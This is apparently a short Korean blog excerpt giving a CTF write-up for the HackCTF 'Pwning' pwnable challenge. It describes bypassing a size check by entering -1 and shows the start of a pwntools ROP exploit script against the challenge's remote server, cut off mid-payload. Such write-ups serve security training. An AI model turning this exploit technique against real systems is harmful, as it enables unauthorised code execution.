pwning
-
[HackCTF : Pwnable] Pwning (300p)Wargame/HackCTF 2021. 12. 27. 16:37
[HackCTF : Pwnable] Pwning (300p) 입력한 숫자만큼의 byte를 입력받는다. 33 이상이면 No! That size (%d) is too large!를 출력하고 종료하는데 -1을 통해 우회할 수 있다. 다음은 그냥 rop 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 from pwn import * # p = process("./pwning") p = remote("ctf.j0n9hyun.xyz",3019) e = ELF("./pwning") prt_plt=e.plt['printf'] prt_got=e.got['printf'] vuln = e.symbols['vuln'] pay..